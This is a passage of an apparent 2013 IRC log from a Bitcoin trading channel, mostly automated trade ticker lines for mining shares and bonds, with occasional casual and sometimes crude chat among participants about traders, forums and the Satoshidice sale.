BTC [+] Jul 20 05:19:47 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 20 05:19:49 [BTCTC] [ASICMINER-PT] 1 @ 4.789994 BTC [+] Jul 20 05:19:51 [BTCTC] [ASICMINER-PT] 2 @ 4.789995 = 9.58 BTC [+] Jul 20 05:19:53 [BTCTC] [ASICMINER-PT] 1 @ 4.79 BTC [+] Jul 20 05:19:55 [BTCTC] [ASICMINER-PT] 2 @ 4.79699 = 9.594 BTC [+] Jul 20 05:19:57 [BTCTC] [ASICMINER-PT] 23 @ 4.796999 = 110.331 BTC [+] Jul 20 05:19:57 [BTCTC] [ASICMINER-PT] 10 @ 4.799 = 47.99 BTC [+] Jul 20 05:22:20 [HAVELOCK] [AM1] 3 @ 4.65 = 13.95 BTC [-] Jul 20 05:22:49 [BTCTC] [TAT.ASICMINER] 24 @ 0.0453 = 1.0872 BTC [-] Jul 20 05:24:27 [BTCTC] [S.MPOE-PT] 43 @ 0.000928 = 0.0399 BTC [+] Jul 20 05:26:42 [BTCTC] [DMS.SELLING] 4 @ 0.024 = 0.096 BTC [+] Jul 20 05:33:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.0453 = 0.1359 BTC [-] Jul 20 05:33:46 [BTCTC] [AMC-PT] 7 @ 0.0026 = 0.0182 BTC [+] Jul 20 05:34:14 [BTCTC] [TAT.ASICMINER] 19 @ 0.045499 = 0.8645 BTC [+] Jul 20 05:34:30 Email sent, re advertisement Jul 20 05:35:36 [BTCTC] [BASIC-MINING] 1 @ 0.723999 BTC [-] Jul 20 05:35:58 [BTCTC] [BASIC-MINING] 2 @ 0.723999 = 1.448 BTC [-] Jul 20 05:36:02 [BTCTC] [BASIC-MINING] 6 @ 0.724 = 4.344 BTC [+] Jul 20 05:38:48 [BTCTC] [COGNITIVE] 10 @ 0.86998 = 8.6998 BTC [+] Jul 20 05:40:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.04563 = 0.365 BTC [+] Jul 20 05:40:32 [HAVELOCK] [AM100] 5 @ 0.044394 = 0.222 BTC [-] Jul 20 05:41:18 [BTCTC] [PAJKA.BOND] 56 @ 0.042017 = 2.353 BTC [-] Jul 20 05:41:20 [BTCTC] [PAJKA.BOND] 74 @ 0.042016 = 3.1092 BTC [-] Jul 20 05:42:12 [BTCTC] [COGNITIVE] 6 @ 0.86998 = 5.2199 BTC [+] Jul 20 05:42:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.04525 = 0.0905 BTC [-] Jul 20 05:42:47 [BTCTC] [DMS.SELLING] 10 @ 0.024 = 0.24 BTC [+] Jul 20 05:42:58 [BTCTC] [COGNITIVE] 1 @ 0.86998 BTC [+] Jul 20 05:50:32 [BTCTC] [AMC-PT] 500 @ 0.0026 = 1.3 BTC [+] Jul 20 05:52:09 [BTCTC] [AMC-PT] 100 @ 0.002599 = 0.2599 BTC [-] Jul 20 05:52:16 [BTCTC] [AMC-PT] 3 @ 0.0026 = 0.0078 BTC [+] Jul 20 05:53:06 [BTCTC] [AMC-PT] 1283 @ 0.002599 = 3.3345 BTC [-] Jul 20 05:53:08 [BTCTC] [AMC-PT] 100 @ 0.00254 = 0.254 BTC [-] Jul 20 05:53:10 [BTCTC] [AMC-PT] 219 @ 0.00253 = 0.5541 BTC [-] Jul 20 05:53:12 [BTCTC] [AMC-PT] 925 @ 0.00252 = 2.331 BTC [-] Jul 20 05:53:53 [BTCTC] [ASICMINER-PT] 3 @ 4.8 = 14.4 BTC [+] Jul 20 05:54:32 [HAVELOCK] [AM100] 100 @ 0.04364 = 4.364 BTC [-] Jul 20 05:54:50 [BTCTC] [ASICMINER-PT] 6 @ 4.8 = 28.8 BTC [+] Jul 20 05:54:52 [BTCTC] [ASICMINER-PT] 2 @ 4.8 = 9.6 BTC [+] Jul 20 05:55:35 [HAVELOCK] [SMG] 100 @ 0.000271 = 0.0271 BTC [-] Jul 20 05:55:38 [HAVELOCK] [SMG] 25 @ 0.00027001 = 0.0068 BTC [-] Jul 20 05:55:40 [HAVELOCK] [SMG] 875 @ 0.00027 = 0.2363 BTC [-] Jul 20 05:57:56 [BTCTC] [AMC-PT] 77 @ 0.00255 = 0.1964 BTC [+] Jul 20 05:59:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.04563 BTC [+] Jul 20 06:00:38 [HAVELOCK] [AM100] 133 @ 0.043641 = 5.8043 BTC [+] Jul 20 06:00:59 [HAVELOCK] [AM100] 65 @ 0.043642 = 2.8367 BTC [+] Jul 20 06:01:02 [HAVELOCK] [AM100] 8 @ 0.043641 = 0.3491 BTC [-] Jul 20 06:06:38 [HAVELOCK] [AM100] 71 @ 0.043652 = 3.0993 BTC [+] Jul 20 06:06:47 [HAVELOCK] [AM100] 35 @ 0.043652 = 1.5278 BTC [+] Jul 20 06:06:55 [HAVELOCK] [AM100] 1 @ 0.043651 BTC [-] Jul 20 06:07:14 [HAVELOCK] [AM100] 27 @ 0.043641 = 1.1783 BTC [-] Jul 20 06:07:16 [HAVELOCK] [AM100] 12 @ 0.04364001 = 0.5237 BTC [-] Jul 20 06:07:21 [BTCTC] [AMC-PT] 200 @ 0.00255 = 0.51 BTC [+] Jul 20 06:07:31 [BTCTC] [ASICMINER-PT] 1 @ 4.858999 BTC [+] Jul 20 06:07:34 [BTCTC] [ASICMINER-PT] 1 @ 4.858999 BTC [+] Jul 20 06:07:51 [HAVELOCK] [AM100] 22 @ 0.043641 = 0.9601 BTC [+] Jul 20 06:08:07 [HAVELOCK] [AM100] 2 @ 0.043641 = 0.0873 BTC [+] Jul 20 06:08:19 [BTCTC] [BASIC-MINING] 2 @ 0.727999 = 1.456 BTC [+] Jul 20 06:09:44 [HAVELOCK] [AM100] 20 @ 0.043641 = 0.8728 BTC [+] Jul 20 06:09:46 [HAVELOCK] [AM100] 4 @ 0.043641 = 0.1746 BTC [+] Jul 20 06:10:15 [HAVELOCK] [AM100] 11 @ 0.043641 = 0.4801 BTC [+] Jul 20 06:10:18 [HAVELOCK] [AM100] 6 @ 0.043641 = 0.2618 BTC [+] Jul 20 06:10:20 [HAVELOCK] [SDSTM] 2 @ 0.01185 = 0.0237 BTC [+] Jul 20 06:10:31 [HAVELOCK] [AM100] 7 @ 0.043641 = 0.3055 BTC [+] Jul 20 06:10:48 [HAVELOCK] [AM100] 8 @ 0.043641 = 0.3491 BTC [+] Jul 20 06:11:24 [HAVELOCK] [AM100] 3 @ 0.043641 = 0.1309 BTC [+] Jul 20 06:11:35 [HAVELOCK] [AM100] 3 @ 0.043641 = 0.1309 BTC [+] Jul 20 06:11:46 [HAVELOCK] [AM100] 5 @ 0.043641 = 0.2182 BTC [+] Jul 20 06:11:49 [HAVELOCK] [AM100] 56 @ 0.04364001 = 2.4438 BTC [-] Jul 20 06:11:58 [BTCTC] [COGNITIVE] 1 @ 0.86998 BTC [+] Jul 20 06:12:07 [HAVELOCK] [AM100] 4 @ 0.043641 = 0.1746 BTC [+] Jul 20 06:12:09 [HAVELOCK] [AM100] 1 @ 0.04364001 BTC [-] Jul 20 06:12:42 [HAVELOCK] [AM100] 2 @ 0.043641 = 0.0873 BTC [+] Jul 20 06:12:53 [HAVELOCK] [AM100] 2 @ 0.043641 = 0.0873 BTC [+] Jul 20 06:13:02 [HAVELOCK] [AM100] 1 @ 0.043641 BTC [+] Jul 20 06:13:05 [HAVELOCK] [AM100] 3 @ 0.04364001 = 0.1309 BTC [-] Jul 20 06:13:07 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9408 BTC [-] Jul 20 06:13:09 [HAVELOCK] [AM100] 1 @ 0.04364001 BTC [-] Jul 20 06:13:24 [HAVELOCK] [AM100] 1 @ 0.043639 BTC [-] Jul 20 06:14:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.04563 = 0.4563 BTC [+] Jul 20 06:14:43 [HAVELOCK] [AM100] 1 @ 0.043639 BTC [-] Jul 20 06:14:53 [HAVELOCK] [AM100] 50 @ 0.04363888 = 2.1819 BTC [-] Jul 20 06:15:03 [HAVELOCK] [AM100] 30 @ 0.04363711 = 1.3091 BTC [-] Jul 20 06:15:12 [HAVELOCK] [AM100] 9 @ 0.04363 = 0.3927 BTC [-] Jul 20 06:15:21 [HAVELOCK] [AM100] 100 @ 0.04362 = 4.362 BTC [-] Jul 20 06:21:39 [MPEX] [S.MG] 15000 @ 0.0002002 = 3.003 BTC [+] Jul 20 06:21:41 [MPEX] [S.MG] 27000 @ 0.00020001 = 5.4003 BTC [-] Jul 20 06:23:13 [BTCTC] [BTC-BOND] 1 @ 0.00995 BTC [-] Jul 20 06:23:37 [HAVELOCK] [SMG] 100 @ 0.0003001 = 0.03 BTC [+] Jul 20 06:23:39 [HAVELOCK] [SMG] 1625 @ 0.00027 = 0.4388 BTC [-] Jul 20 06:23:41 [HAVELOCK] [SMG] 825 @ 0.00026225 = 0.2164 BTC [-] Jul 20 06:23:44 [HAVELOCK] [SMG] 500 @ 0.0002622 = 0.1311 BTC [-] Jul 20 06:23:46 [HAVELOCK] [SMG] 1120 @ 0.0002621 = 0.2936 BTC [-] Jul 20 06:23:48 [HAVELOCK] [SMG] 100 @ 0.0002615 = 0.0262 BTC [-] Jul 20 06:23:49 [HAVELOCK] [SMG] 3668 @ 0.00026134 = 0.9586 BTC [-] Jul 20 06:23:51 [HAVELOCK] [SMG] 62 @ 0.000261 = 0.0162 BTC [-] Jul 20 06:24:40 [HAVELOCK] [SMG] 5000 @ 0.0002611 = 1.3055 BTC [+] Jul 20 06:24:43 [HAVELOCK] [SMG] 38 @ 0.000261 = 0.0099 BTC [-] Jul 20 06:24:45 [HAVELOCK] [SMG] 324 @ 0.0002608 = 0.0845 BTC [-] Jul 20 06:24:47 [HAVELOCK] [SMG] 1000 @ 0.000251 = 0.251 BTC [-] Jul 20 06:24:49 [HAVELOCK] [SMG] 638 @ 0.00025 = 0.1595 BTC [-] Jul 20 06:25:38 [BTCTC] [AMC-PT] 100 @ 0.002525 = 0.2525 BTC [-] Jul 20 06:25:40 [BTCTC] [AMC-PT] 75 @ 0.00252 = 0.189 BTC [-] Jul 20 06:25:42 [BTCTC] [AMC-PT] 2000 @ 0.002513 = 5.026 BTC [-] Jul 20 06:25:44 [BTCTC] [AMC-PT] 3050 @ 0.002512 = 7.6616 BTC [-] Jul 20 06:25:44 [BTCTC] [AMC-PT] 381 @ 0.002511 = 0.9567 BTC [-] Jul 20 06:25:48 [BTCTC] [AMC-PT] 5000 @ 0.00251 = 12.55 BTC [-] Jul 20 06:25:52 [BTCTC] [AMC-PT] 50 @ 0.00251 = 0.1255 BTC [-] Jul 20 06:25:54 [BTCTC] [AMC-PT] 1372 @ 0.002501 = 3.4314 BTC [-] Jul 20 06:25:55 [BTCTC] [AMC-PT] 7371 @ 0.0025 = 18.4275 BTC [-] Jul 20 06:25:57 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 06:25:58 [BTCTC] [AMC-PT] 8000 @ 0.0025 = 20 BTC [-] Jul 20 06:25:59 [BTCTC] [AMC-PT] 2400 @ 0.0025 = 6 BTC [-] Jul 20 06:26:01 [BTCTC] [AMC-PT] 2640 @ 0.0025 = 6.6 BTC [-] Jul 20 06:26:03 [BTCTC] [AMC-PT] 220 @ 0.0025 = 0.55 BTC [-] Jul 20 06:28:36 [HAVELOCK] [AM100] 10 @ 0.04350011 = 0.435 BTC [-] Jul 20 06:29:23 [HAVELOCK] [AM100] 13 @ 0.04350011 = 0.5655 BTC [-] Jul 20 06:30:21 [BTCTC] [BTC-BOND] 9 @ 0.009995 = 0.09 BTC [+] Jul 20 06:31:21 [BTCTC] [COGNITIVE] 1 @ 0.86998 BTC [+] Jul 20 06:33:01 [BTCTC] [ASICMINER-PT] 1 @ 4.858999 BTC [+] Jul 20 06:33:04 [BTCTC] [ASICMINER-PT] 2 @ 4.859 = 9.718 BTC [+] Jul 20 06:33:06 [BTCTC] [ASICMINER-PT] 2 @ 4.87988 = 9.7598 BTC [+] Jul 20 06:36:40 [HAVELOCK] [AM100] 100 @ 0.0443 = 4.43 BTC [+] Jul 20 06:41:56 !t s.mpoe Jul 20 06:41:57 Have you got any tobacco? Jul 20 06:42:42 [BTCTC] [AMC-PT] 291 @ 0.0025 = 0.7275 BTC [-] Jul 20 06:46:17 [HAVELOCK] [AM100] 100 @ 0.0435002 = 4.35 BTC [-] Jul 20 06:47:56 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003693 = 0.0369 BTC [+] Jul 20 06:49:07 !t m s.mpoe Jul 20 06:49:08 [MPEX:S.MPOE] 1D: 0.00087903 / 0.00088598 / 0.00089369 (148279 shares, 131.37 BTC), 7D: 0.00077252 / 0.00087714 / 0.00097228 (2222826 shares, 1,949.75 BTC), 30D: 0.00067998 / 0.00078031 / 0.00097228 (60008110 shares, 46,825.52 BTC) Jul 20 06:49:19 ;;help Jul 20 06:49:19 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Jul 20 06:49:31 [BTCTC] [AMC-PT] 30 @ 0.002462 = 0.0739 BTC [-] Jul 20 06:49:41 [BTCTC] [BITVPS] 20 @ 0.001899 = 0.038 BTC [-] Jul 20 06:49:54 [BTCTC] [AMC-PT] 6 @ 0.002461 = 0.0148 BTC [-] Jul 20 06:50:11 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003693 = 0.0185 BTC [+] Jul 20 06:51:06 ;;gpg Jul 20 06:51:07 Error: "gpg" is not a valid command. Jul 20 06:51:10 orly. Jul 20 06:51:53 [BTCTC] [AMC-PT] 30 @ 0.002422 = 0.0727 BTC [-] Jul 20 06:52:36 [BTCTC] [AMC-PT] 1 @ 0.002421 BTC [-] Jul 20 06:52:38 [BTCTC] [AMC-PT] 24 @ 0.00241 = 0.0578 BTC [-] Jul 20 06:53:09 [BTCTC] [AMC-PT] 1000 @ 0.002402 = 2.402 BTC [-] Jul 20 06:53:27 [BTCTC] [ASICMINER-PT] 10 @ 4.82 = 48.2 BTC [-] Jul 20 06:53:43 [BTCTC] [AMC-PT] 5 @ 0.0024 = 0.012 BTC [-] Jul 20 06:53:46 [BTCTC] [AMC-PT] 50 @ 0.0024 = 0.12 BTC [-] Jul 20 06:53:47 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [-] Jul 20 06:53:49 [BTCTC] [AMC-PT] 200 @ 0.0024 = 0.48 BTC [-] Jul 20 06:53:52 [BTCTC] [AMC-PT] 16 @ 0.00231 = 0.037 BTC [-] Jul 20 06:55:15 [BTCTC] [AMC-PT] 438 @ 0.002402 = 1.0521 BTC [+] Jul 20 06:57:41 [BTCTC] [AMC-PT] 4 @ 0.002498 = 0.01 BTC [+] Jul 20 07:00:23 [BTCTC] [AMC-PT] 3 @ 0.002498 = 0.0075 BTC [+] Jul 20 07:01:25 [HAVELOCK] [AM100] 500 @ 0.0435101 = 21.7551 BTC [+] Jul 20 07:04:51 [BTCTC] [COGNITIVE] 2 @ 0.865 = 1.73 BTC [-] Jul 20 07:04:53 [BTCTC] [COGNITIVE] 1 @ 0.86998 BTC [+] Jul 20 07:04:54 [BTCTC] [COGNITIVE] 1 @ 0.89 BTC [+] Jul 20 07:05:01 [BTCTC] [COGNITIVE] 2 @ 0.9 = 1.8 BTC [+] Jul 20 07:05:03 [BTCTC] [COGNITIVE] 1 @ 0.9 BTC [+] Jul 20 07:05:04 [BTCTC] [COGNITIVE] 3 @ 0.900002 = 2.7 BTC [+] Jul 20 07:05:19 [BTCTC] [COGNITIVE] 1 @ 0.905756 BTC [+] Jul 20 07:07:05 [BTCTC] [S.BBET-PT] 10 @ 0.002019 = 0.0202 BTC [+] Jul 20 07:10:23 [BTCTC] [FIMB] 1 @ 0.011 BTC [+] Jul 20 07:12:35 [BTCTC] [ASICMINER-PT] 1 @ 4.780002 BTC [-] Jul 20 07:12:37 [BTCTC] [ASICMINER-PT] 1 @ 4.77 BTC [-] Jul 20 07:13:04 [BTCTC] [TAT.ASICMINER] 5 @ 0.045627 = 0.2281 BTC [-] Jul 20 07:17:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:17:49 [BTCTC] [ASICMINER-PT] 2 @ 4.7661 = 9.5322 BTC [-] Jul 20 07:17:50 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:18:36 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:18:38 [BTCTC] [ASICMINER-PT] 2 @ 4.766 = 9.532 BTC [-] Jul 20 07:19:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:20:00 [HAVELOCK] [SDSTM] 35 @ 0.0115 = 0.4025 BTC [-] Jul 20 07:20:17 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:21:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003679 = 0.0368 BTC [-] Jul 20 07:21:57 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003669 = 0.0367 BTC [-] Jul 20 07:22:43 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003669 = 0.0367 BTC [-] Jul 20 07:22:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00367 BTC [+] Jul 20 07:25:17 [HAVELOCK] [SDSTM] 2 @ 0.01185 = 0.0237 BTC [+] Jul 20 07:26:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003659 = 0.0366 BTC [-] Jul 20 07:27:06 [HAVELOCK] [SMG] 500 @ 0.0003289 = 0.1645 BTC [+] Jul 20 07:27:18 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003659 = 0.0366 BTC [-] Jul 20 07:28:33 [BTCTC] [S.MPOE-PT] 2 @ 0.000928 = 0.0019 BTC [+] Jul 20 07:30:15 [BTCTC] [COGNITIVE] 16 @ 0.905756 = 14.4921 BTC [+] Jul 20 07:32:16 oh yeah I removed the symlink for that Jul 20 07:32:53 [HAVELOCK] [HIM] 1 @ 0.268 BTC [-] Jul 20 07:35:23 [BTCTC] [TAT.ASICMINER] 18 @ 0.04563 = 0.8213 BTC [+] Jul 20 07:36:07 [HAVELOCK] [SDSTM] 9 @ 0.01195 = 0.1076 BTC [+] Jul 20 07:36:51 [BTCTC] [ASICMINER-PT] 2 @ 4.85 = 9.7 BTC [+] Jul 20 07:37:14 [BTCTC] [COGNITIVE] 1 @ 0.875001 BTC [-] Jul 20 07:39:58 [BTCTC] [COGNITIVE] 3 @ 0.905756 = 2.7173 BTC [+] Jul 20 07:40:05 [BTCTC] [COGNITIVE] 1 @ 0.9435 BTC [+] Jul 20 07:40:18 [BTCTC] [COGNITIVE] 1 @ 0.944 BTC [+] Jul 20 07:40:20 [BTCTC] [COGNITIVE] 11 @ 0.949999 = 10.45 BTC [+] Jul 20 07:49:35 [BTCTC] [DMS.PURCHASE] 62 @ 0.039416 = 2.4438 BTC [-] Jul 20 07:50:19 [BTCTC] [AMC-PT] 7 @ 0.00241 = 0.0169 BTC [-] Jul 20 07:50:20 [BTCTC] [AMC-PT] 7 @ 0.00241 = 0.0169 BTC [-] Jul 20 07:51:30 [MPEX] [S.MPOE] 2293 @ 0.00093185 = 2.1367 BTC [+] Jul 20 07:51:32 [MPEX] [S.MG] 20000 @ 0.0002002 = 4.004 BTC [+] Jul 20 07:51:47 [MPEX] [S.MG] 43000 @ 0.00020001 = 8.6004 BTC [-] Jul 20 07:51:50 [MPEX] [S.MG] 4355 @ 0.000195 = 0.8492 BTC [-] Jul 20 07:51:57 [BTCTC] [DMS.PURCHASE] 320 @ 0.039416 = 12.6131 BTC [-] Jul 20 07:52:23 [BTCTC] [AMC-PT] 7 @ 0.002497 = 0.0175 BTC [+] Jul 20 07:52:33 [BTCTC] [DMS.PURCHASE] 22 @ 0.039416 = 0.8672 BTC [-] Jul 20 07:52:45 [BTCTC] [AMC-PT] 14 @ 0.002498 = 0.035 BTC [+] Jul 20 07:52:47 [BTCTC] [AMC-PT] 13 @ 0.002499 = 0.0325 BTC [+] Jul 20 07:53:07 [BTCTC] [AMC-PT] 13 @ 0.002498 = 0.0325 BTC [-] Jul 20 07:53:35 [BTCTC] [AMC-PT] 1800 @ 0.0025 = 4.5 BTC [+] Jul 20 07:53:47 [BTCTC] [AMC-PT] 10 @ 0.002498 = 0.025 BTC [-] Jul 20 07:54:08 [MPEX] [O.USD.P320T] 400 @ 2.56838089 = 1027.3524 BTC [+] Jul 20 07:54:48 [BTCTC] [AMC-PT] 68 @ 0.0025 = 0.17 BTC [+] Jul 20 07:54:59 [BTCTC] [AMC-PT] 437 @ 0.0025 = 1.0925 BTC [+] Jul 20 07:59:04 [HAVELOCK] [AM100] 4 @ 0.04405998 = 0.1762 BTC [+] Jul 20 08:00:11 [HAVELOCK] [AM100] 2 @ 0.04405998 = 0.0881 BTC [+] Jul 20 08:00:19 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003661 = 0.0183 BTC [+] **** BEGIN LOGGING AT Sat Jul 20 16:29:01 2013 Jul 20 16:29:11 hi mircea Jul 20 16:29:15 heya Jul 20 16:29:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.045579 = 1.3674 BTC [-] Jul 20 16:29:38 [BTCTC] [TAT.ASICMINER] 43 @ 0.044828 = 1.9276 BTC [-] Jul 20 16:29:40 [BTCTC] [TAT.ASICMINER] 32 @ 0.044827 = 1.4345 BTC [-] Jul 20 16:29:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.044826 = 0.1793 BTC [-] Jul 20 16:29:43 [HAVELOCK] [SMG] 12 @ 0.000294 = 0.0035 BTC [+] Jul 20 16:29:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.044821 = 0.2241 BTC [-] Jul 20 16:29:47 [BTCTC] [TAT.ASICMINER] 56 @ 0.044811 = 2.5094 BTC [-] Jul 20 16:29:49 mircea_popescu: so, your slaves, they only are your slaves because you're rich, right? Jul 20 16:30:01 afaik it has nothing to do with it Jul 20 16:30:02 btc rich* Jul 20 16:30:07 fiat poor Jul 20 16:30:07 ;;ticker Jul 20 16:30:08 MtGox BTCUSD ticker | Best bid: 91.68663, Best ask: 91.99330, Bid-ask spread: 0.30667, Last trade: 91.68661, 24 hour volume: 24049.04655450, 24 hour low: 89.60200, 24 hour high: 95.20010, 24 hour vwap: 92.60465 Jul 20 16:30:10 it's the coolness Jul 20 16:30:16 Scrat: rich enough Jul 20 16:30:24 [HAVELOCK] [SMG] 100 @ 0.000294 = 0.0294 BTC [+] Jul 20 16:30:34 mircea_popescu: yeah, but its not dick size either Jul 20 16:30:42 [BTCTC] [DMS.MINING] 1 @ 0.016243 BTC [+] Jul 20 16:30:59 no, it's just that some people chose not to fritter away their lives in the great pop vat of nonsense. Jul 20 16:31:03 [HAVELOCK] [AM100] 119 @ 0.043799 = 5.2121 BTC [+] Jul 20 16:31:05 [HAVELOCK] [AM100] 25 @ 0.0438 = 1.095 BTC [+] Jul 20 16:31:08 [HAVELOCK] [SMG] 20 @ 0.000294 = 0.0059 BTC [+] Jul 20 16:31:27 yeah, but why wouldnt they focus on bettering themselves and the world instead? Jul 20 16:31:38 the world is not theirs to better. Jul 20 16:31:46 thats a cop out and you know it Jul 20 16:31:48 being a slave is the best way to better oneself. Jul 20 16:31:52 nope. Jul 20 16:31:53 [BTCTC] [TAT.ASICMINER] 44 @ 0.044811 = 1.9717 BTC [-] Jul 20 16:31:56 [BTCTC] [TAT.ASICMINER] 39 @ 0.04481 = 1.7476 BTC [-] Jul 20 16:32:00 [BTCTC] [TAT.ASICMINER] 81 @ 0.0448 = 3.6288 BTC [-] Jul 20 16:32:17 [BTCTC] [AMC-PT] 25 @ 0.002571 = 0.0643 BTC [+] Jul 20 16:34:36 [BTCTC] [LTC-ATF.B2] 80 @ 0.01 = 0.8 BTC [+] Jul 20 16:36:01 [BTCTC] [AMC-PT] 162 @ 0.00257 = 0.4163 BTC [-] Jul 20 16:36:48 [BTCTC] [BFMINES] 2692 @ 0.003999 = 10.7653 BTC [+] Jul 20 16:36:50 [BTCTC] [BFMINES] 250 @ 0.003999 = 0.9998 BTC [+] Jul 20 16:36:59 [BTCTC] [BFMINES] 2358 @ 0.004 = 9.432 BTC [+] Jul 20 16:37:51 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC [+] Jul 20 16:38:21 [BTCTC] [RSM] 30 @ 0.0171 = 0.513 BTC [+] Jul 20 16:38:24 [BTCTC] [RSM] 5 @ 0.017072 = 0.0854 BTC [-] Jul 20 16:38:25 [BTCTC] [RSM] 42 @ 0.01705 = 0.7161 BTC [-] Jul 20 16:40:09 [BTCTC] [BASIC-MINING] 1 @ 0.728 BTC [+] Jul 20 16:40:19 [BTCTC] [AMC-PT] 4000 @ 0.002627 = 10.508 BTC [+] Jul 20 16:40:51 [BTCTC] [AMC-PT] 400 @ 0.002627 = 1.0508 BTC [+] Jul 20 16:43:22 [BTCTC] [BMF] 1 @ 0.035998 BTC [+] Jul 20 16:43:24 [BTCTC] [BMF] 1 @ 0.035999 BTC [+] Jul 20 16:43:25 [BTCTC] [BMF] 28 @ 0.036 = 1.008 BTC [+] Jul 20 16:45:49 [BTCTC] [S.BBET-PT] 1 @ 0.002019 BTC [+] Jul 20 16:48:36 [BTCTC] [DMS.PURCHASE] 25 @ 0.039416 = 0.9854 BTC [-] Jul 20 16:50:26 [BTCTC] [TAT.ASICMINER] 31 @ 0.045099 = 1.3981 BTC [+] Jul 20 16:52:16 [BTCTC] [S.MPOE-PT] 1 @ 0.000944 BTC [+] Jul 20 16:52:16 *pours a drink for miningbuddy, because everyone should have one of those* Jul 20 16:52:33 are you watching my webcam? Jul 20 16:52:39 Diablo-D3: you do focus on bettering yourdelf and the world? Jul 20 16:52:43 I literally took a sip of my southern comfort as you said that Jul 20 16:55:57 [BTCTC] [ASICMINER-PT] 1 @ 4.652001 BTC [-] Jul 20 16:56:48 [BTCTC] [ASICMINER-PT] 4 @ 4.652 = 18.608 BTC [-] Jul 20 16:57:08 lol miningbuddy Jul 20 17:01:06 jurov: only when Im not hating the world. Jul 20 17:02:00 and when you are not hating yourself, i spose Jul 20 17:02:17 kinda same here Jul 20 17:04:31 *wonders if the miningbuddy here is the one of reddit fame* Jul 20 17:04:46 [BTCTC] [ASICMINER-PT] 1 @ 4.6898 BTC [+] Jul 20 17:05:07 So Satoshidice was sold for 11.5 Million US$ in btc? Jul 20 17:05:24 fame? hahaha, but yeah thats me on reddit & the forum Jul 20 17:06:09 gee, the loads of wanna-be scammers on the forums butthurt at how other people do stuff with like bitcoin in it Jul 20 17:06:12 [BTCTC] [BFMINES] 100 @ 0.004 = 0.4 BTC [+] Jul 20 17:06:12 kinda lulzy by now Jul 20 17:06:31 "x is a scammer just like me! because i say so! because everything smells like shit to the guy with shit on his nose!!!" Jul 20 17:06:35 my hats off to you miningbuddy sir. Happy caturday Jul 20 17:06:38 "why did he get btc and i didnt!!11!" Jul 20 17:06:45 [BTCTC] [AMC-PT] 219 @ 0.002622 = 0.5742 BTC [-] Jul 20 17:07:05 CheckDavid http://gigaom.com/2013/07/19/someone-just-sold-a-bitcoin-business-for-11-4m-its-a-first-but-the-buyers-anonymous/ Jul 20 17:07:08 prolly the better summary. Jul 20 17:07:14 PirateKitteh what reddit fame is that ? Jul 20 17:07:55 mircea_popescu: from the /r/bitcoin subreddit Jul 20 17:08:19 on the face of it reddit fame pretty much counts as being retarded here. Jul 20 17:09:12 [BTCTC] [AMC-PT] 25 @ 0.002551 = 0.0638 BTC [-] Jul 20 17:09:12 [BTCTC] [AMC-PT] 100 @ 0.00255 = 0.255 BTC [-] Jul 20 17:09:14 [BTCTC] [AMC-PT] 300 @ 0.002526 = 0.7578 BTC [-] Jul 20 17:09:15 [BTCTC] [AMC-PT] 380 @ 0.002525 = 0.9595 BTC [-] Jul 20 17:09:17 [BTCTC] [AMC-PT] 200 @ 0.002501 = 0.5002 BTC [-] Jul 20 17:09:18 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jul 20 17:09:32 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.003908 = 0.0352 BTC [-] Jul 20 17:09:34 mircea_popescu: well like everywhere else they have their smacktards Jul 20 17:09:48 thanks mircea_popescu , also, are you the owner of MPEX? Jul 20 17:10:12 [BTCTC] [BMF] 1 @ 0.033 BTC [-] Jul 20 17:10:14 [BTCTC] [BMF] 24 @ 0.033 = 0.792 BTC [-] Jul 20 17:10:16 [BTCTC] [BMF] 2 @ 0.03293 = 0.0659 BTC [-] Jul 20 17:10:18 [BTCTC] [BMF] 2 @ 0.03293 = 0.0659 BTC [-] Jul 20 17:10:19 [BTCTC] [BMF] 1 @ 0.03293 BTC [-] Jul 20 17:10:21 [BTCTC] [BMF] 20 @ 0.03251 = 0.6502 BTC [-] Jul 20 17:10:40 yes. Jul 20 17:10:52 PirateKitteh indeed. Jul 20 17:11:22 [BTCTC] [AMC-PT] 1311 @ 0.002621 = 3.4361 BTC [+] Jul 20 17:11:36 I never bothered with bicointalk much until a few months ago. Many to be found there Jul 20 17:11:52 What is everybody here's opinion of Usagi? Is BMF worth what people are paying for it? Jul 20 17:12:04 pigeons ahaha listen to this : mrbiggs teh riaa sockpuppet of forum fame was hired by "open"coin last week. Jul 20 17:12:26 peterl usagi is basically our premiere lolcow. Jul 20 17:12:29 [BTCTC] [AMC-PT] 31 @ 0.002621 = 0.0813 BTC [+] Jul 20 17:12:44 [BTCTC] [AMC-PT] 2000 @ 0.00251 = 5.02 BTC [-] Jul 20 